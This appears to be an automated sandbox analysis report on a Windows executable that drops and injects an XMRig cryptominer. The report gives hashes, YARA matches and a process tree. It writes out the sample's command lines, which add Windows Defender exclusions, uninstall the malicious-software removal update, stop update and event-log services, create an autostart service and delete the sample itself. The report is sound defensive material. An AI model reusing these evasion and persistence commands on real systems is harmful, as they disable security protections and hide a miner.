Analysis
max time kernel: 120s
max time network: 120s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 18/10/2024, 09:31
Static task: static1
Behavioral task: behavioral1
Sample: 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe
Resource: win7-20241010-en
General
Target: 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe
Size: 5.5MB
MD5: e5629c2b0355884c7a022372c1a5e160
SHA1: ba6c548fe73f1803797a8a93b6033ca4ba4af1eb
SHA256: 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775c
SHA512: 523f09776fa764bb1b9e1b6465aaa3e44a9be0dafc662db197b9578451c6620a28a7f9e286652fcf0514ff6b4eb8b5c2ebba263afe764e085db4b911bc1e5281
SSDEEP: 98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/Hn:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgj
Malware Config
Signatures

XMRig Miner payload 8 IoCs
resource | yara_rule
behavioral1/memory/1380-28-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1380-34-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1380-35-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1380-33-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1380-32-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1380-31-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1380-29-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1380-38-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
880 | powershell.exe
2772 | powershell.exe

Creates new service(s) 2 TTPs

Deletes itself 1 IoCs
pid | Process
1508 | cmd.exe

Executes dropped EXE 2 IoCs
pid | Process
476 | Process not Found
2348 | fqwofdtexigy.exe

Loads dropped DLL 1 IoCs
pid | Process
476 | Process not Found

Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid | Process
2340 | powercfg.exe
2556 | powercfg.exe
2104 | powercfg.exe
604 | powercfg.exe
2972 | powercfg.exe
2704 | powercfg.exe
2700 | powercfg.exe
2744 | powercfg.exe

Drops file in System32 directory 4 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\MRT.exe | fqwofdtexigy.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 2348 set thread context of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 set thread context of 1380 | 2348 | fqwofdtexigy.exe | 88

UPX yara rule match 13 IoCs
resource | yara_rule
behavioral1/memory/1380-27-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-28-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-34-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-35-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-33-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-32-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-31-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-29-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-26-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-25-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-23-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-24-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1380-38-0x0000000140000000-0x0000000140848000-memory.dmp | upx

Drops file in Windows directory 2 IoCs
description | ioc | Process
File created | C:\Windows\wusa.lock | wusa.exe
File created | C:\Windows\wusa.lock | wusa.exe
Launches sc.exe 14 IoCs
sc.exe is a Windows utility to control services on the system.
pid | Process
2852 | sc.exe
684 | sc.exe
1500 | sc.exe
1028 | sc.exe
2128 | sc.exe
2976 | sc.exe
3048 | sc.exe
3056 | sc.exe
2720 | sc.exe
3060 | sc.exe
2656 | sc.exe
588 | sc.exe
2172 | sc.exe
2336 | sc.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10c0db834021db01 | powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 11 IoCs
description | pid | Process
Token: SeDebugPrivilege | 880 | powershell.exe
Token: SeShutdownPrivilege | 2704 | powercfg.exe
Token: SeShutdownPrivilege | 2700 | powercfg.exe
Token: SeShutdownPrivilege | 2972 | powercfg.exe
Token: SeShutdownPrivilege | 604 | powercfg.exe
Token: SeDebugPrivilege | 2772 | powershell.exe
Token: SeLockMemoryPrivilege | 1380 | nslookup.exe
Token: SeShutdownPrivilege | 2744 | powercfg.exe
Token: SeShutdownPrivilege | 2104 | powercfg.exe
Token: SeShutdownPrivilege | 2340 | powercfg.exe
Token: SeShutdownPrivilege | 2556 | powercfg.exe

Suspicious use of WriteProcessMemory 23 IoCs
description | pid | Process | procid_target
PID 2960 wrote to memory of 2828 | 2960 | cmd.exe | 38
PID 2960 wrote to memory of 2828 | 2960 | cmd.exe | 38
PID 2960 wrote to memory of 2828 | 2960 | cmd.exe | 38
PID 1508 wrote to memory of 2792 | 1508 | cmd.exe | 64
PID 1508 wrote to memory of 2792 | 1508 | cmd.exe | 64
PID 1508 wrote to memory of 2792 | 1508 | cmd.exe | 64
PID 2328 wrote to memory of 1648 | 2328 | cmd.exe | 73
PID 2328 wrote to memory of 1648 | 2328 | cmd.exe | 73
PID 2328 wrote to memory of 1648 | 2328 | cmd.exe | 73
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 2084 | 2348 | fqwofdtexigy.exe | 86
PID 2348 wrote to memory of 1380 | 2348 | fqwofdtexigy.exe | 88
PID 2348 wrote to memory of 1380 | 2348 | fqwofdtexigy.exe | 88
PID 2348 wrote to memory of 1380 | 2348 | fqwofdtexigy.exe | 88
PID 2348 wrote to memory of 1380 | 2348 | fqwofdtexigy.exe | 88
PID 2348 wrote to memory of 1380 | 2348 | fqwofdtexigy.exe | 88
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe"
  PID: 2052
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - [2] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    PID: 880
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    PID: 2960
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\wusa.exe
      Command line: wusa /uninstall /kb:890830 /quiet /norestart
      PID: 2828
      - Drops file in Windows directory
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop UsoSvc
    PID: 2976
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    PID: 2852
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop wuauserv
    PID: 3060
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop bits
    PID: 3048
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop dosvc
    PID: 3056
    - Launches sc.exe
  - [2] C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    PID: 604
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    PID: 2972
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    PID: 2704
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    PID: 2700
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe delete "JVNIRHNX"
    PID: 2720
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"
    PID: 2656
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop eventlog
    PID: 684
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe start "JVNIRHNX"
    PID: 588
    - Launches sc.exe
  - [2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe"
    PID: 1508
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\choice.exe
      Command line: choice /C Y /N /D Y /T 3
      PID: 2792
- [1] C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe
  Command line: C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe
  PID: 2348
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    PID: 2772
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    PID: 2328
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\wusa.exe
      Command line: wusa /uninstall /kb:890830 /quiet /norestart
      PID: 1648
      - Drops file in Windows directory
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop UsoSvc
    PID: 2172
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    PID: 2336
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop wuauserv
    PID: 1500
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop bits
    PID: 1028
    - Launches sc.exe
  - [2] C:\Windows\system32\sc.exe
    Command line: C:\Windows\system32\sc.exe stop dosvc
    PID: 2128
    - Launches sc.exe
  - [2] C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    PID: 2744
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    PID: 2340
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    PID: 2556
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    PID: 2104
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\conhost.exe
    Command line: C:\Windows\system32\conhost.exe
    PID: 2084
  - [2] C:\Windows\system32\nslookup.exe
    Command line: nslookup.exe
    PID: 1380
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 5.5MB
MD5: e5629c2b0355884c7a022372c1a5e160
SHA1: ba6c548fe73f1803797a8a93b6033ca4ba4af1eb
SHA256: 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775c
SHA512: 523f09776fa764bb1b9e1b6465aaa3e44a9be0dafc662db197b9578451c6620a28a7f9e286652fcf0514ff6b4eb8b5c2ebba263afe764e085db4b911bc1e5281